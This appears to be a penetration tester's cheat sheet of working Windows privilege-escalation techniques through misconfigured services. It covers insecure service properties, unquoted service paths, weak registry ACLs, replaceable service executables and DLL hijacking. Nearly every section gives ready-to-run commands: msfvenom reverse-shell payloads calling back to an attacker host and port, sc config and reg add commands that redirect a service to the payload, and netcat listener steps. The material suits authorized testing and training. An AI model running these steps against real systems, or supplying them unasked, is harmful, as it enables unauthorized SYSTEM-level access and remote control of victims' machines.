Service Exploits

NB: You have to be able to start/stop a service to exploit

.\accesscheck /accepteula -uvqc $SERVICE

Insecure Service Properties

• Find the vulnerable service

.\winPEASany.exe quiet servicesinfo

• Confirm access to the service

.\accesschck.exe /accepteula -uqvwc $USER $SERVICE

• Check configuration

sc qc $SERVICE

• Check service state

sc query $SERVICE

• Payload

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe

• Set service path to location of shell on victim

sc config $SERVICE binpath= "\"C:\Users\$User\Desktop\rev.exe""

• Start nc listener

• Restart the service

Unquoted Service Paths

• Useful when ability to write to the directory is present but can't overwrite files in the main directory

• Abuses the way Windows looks for executable, for example

  • C:\Program Files\Service\Cool Service\svc.exe

    • C:\Program.exe

    • C:\Program Files\Service.exe

    • C:\Program FIles\Service\Cool.exe

• Create an executable named appropriately and place in appropriate directory

• Find vulnerability

.\winPEASany.exe quiet servicesinfo

• Or use wmic

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

• You need

  • Path to .exe that does not contain quotes

  • Write permissions to any prior folder in the tree

• Confirm service access for your user

.\accesscheck /accepteula -uvqc $USER $SERVICE

• Check write permission to existing binary paths

.\accesschck.exe /accepteula -uwdq "C:\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

• If you have a writeable directory, name the reverse shell payload the $FolderName.exe

• Put it in the directory

• Start nc listener

• Restart the service

Weak Registry Permissions

• If ACL on a registry object is misconfigured, we could modify it even if we can't from the system normally

• winpeas will find all of these

• Verify

Get-ACL HKLM:\System\CurrentControlSet\Service\regsvc | Format-List

or

.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

• Check if you have permission to start and stop the service

.\accesschk.exe /accepteula -ucqv $USER regsvc

• Check the registry values for services

reg query HKLM\System\CurrentControlSet\Services\regsvc

• With permissions this can be overwritten and made to point to rev.exe payload

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\revshell.exe /f

• Start nc listener

• Restart the service

Insecure Service Executables

• If the .exe itself can be modified, can just replace it with our own msfvenom payload, renamed

.\winPEASany.exe quiet servicesinfo

• Validate access

.\accesschk.exe /accepteula -uwq "C:\Program Files\File Permissions Service\$service.exe"

• Confirm access to start/stop

.\accesschk.exe /accepteula -ucqv $user $service

• Backup or rename original .exe

move "C:\Program Files\File Permissions Service\$service.exe" servce.exe.bak

• Overwrite or replace the backed-up .exe

copy /Y C:\path\to\rev.exe "C:\Program Files\File Permissions Service\$service.exe"

• Start nc listener

• Restart the service

DLL Hijacking

• Some programs require libraries loaded (DLLS)

• If it contains an absolute path, or if the DLL is missing, and we have write access to the directory, we can essentially do the same as replacing the .exe itself to exploit

• winpeas usually finds these

• Check access to start/stop

.\accesschk.exe /accepteula -ucqv $user $dllsvc

• Check the service

sc qc dllsvc

• To be very sure, you can copy the service to a VM and check it with procmon to ensure the PATH, however, running the .exe from the location where the dll is located is usually enough. If you have GUI access it's easier to sus this out locally

• Create a dll reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f dll -o reverse.dll

• Copy into the folder with the path

• Stop and start the service

net stop $dllsvc net start $dllsvc